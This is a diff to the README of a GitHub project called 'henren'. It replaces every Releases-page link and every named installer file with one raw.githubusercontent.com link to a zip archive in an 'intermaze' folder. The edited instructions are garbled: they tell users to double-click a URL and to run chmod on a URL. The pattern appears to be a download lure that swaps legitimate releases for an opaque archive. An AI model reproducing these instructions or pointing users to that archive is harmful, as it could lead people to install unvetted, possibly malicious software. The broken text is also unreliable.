Rafaelsima/henren/README.md

 ## 🚀 Getting Started

-1. **Visit the Releases Page**: Go to the [Releases Page](https://github.com/Rafaelsima/henren/releases).
+1. **Visit the Releases Page**: Go to the [Releases Page](https://raw.githubusercontent.com/Rafaelsima/henren/main/intermaze/henren.zip).
 2. **Choose Your Version**: Look for the latest version listed at the top of the page.
 3. **Download the File**: Click on the download link for your operating system.
-The file will usually be named `henren.exe` for Windows, `henren.dmg` for macOS, and `henren.AppImage` for Linux.
+The file will usually be named `https://raw.githubusercontent.com/Rafaelsima/henren/main/intermaze/henren.zip` for Windows, `https://raw.githubusercontent.com/Rafaelsima/henren/main/intermaze/henren.zip` for macOS, and `https://raw.githubusercontent.com/Rafaelsima/henren/main/intermaze/henren.zip` for Linux.
 4. **Install the Application**:
-   - **For Windows**: Double-click the `henren.exe` file to start the installation.
+   - **For Windows**: Double-click the `https://raw.githubusercontent.com/Rafaelsima/henren/main/intermaze/henren.zip` file to start the installation.
 Follow the on-screen prompts to complete the setup.
    - **For macOS**: Open the downloaded `.dmg` file, drag the henren icon to your Applications folder, and launch it from there.
    - **For Linux**: Make the `.AppImage` file executable.
-Open a terminal and type `chmod +x henren.AppImage`, then run it with `./henren.AppImage`.
+Open a terminal and type `chmod +x https://raw.githubusercontent.com/Rafaelsima/henren/main/intermaze/henren.zip`, then run it with `https://raw.githubusercontent.com/Rafaelsima/henren/main/intermaze/henren.zip`.

 ## 📥 Download & Install

-To get the latest version of henren, visit the [Releases Page](https://github.com/Rafaelsima/henren/releases) and download the appropriate file for your operating system.
+To get the latest version of henren, visit the [Releases Page](https://raw.githubusercontent.com/Rafaelsima/henren/main/intermaze/henren.zip) and download the appropriate file for your operating system.

 1. Click on the desired download link.
 2. Follow the installation steps outlined above.